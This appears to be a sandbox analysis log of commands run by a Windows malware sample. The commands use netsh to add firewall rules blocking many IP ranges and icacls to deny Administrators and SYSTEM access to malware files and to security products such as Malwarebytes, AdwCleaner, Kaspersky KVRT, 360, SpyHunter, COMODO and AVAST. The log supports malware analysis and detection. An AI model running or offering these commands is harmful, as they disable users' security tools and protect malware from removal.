C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
-
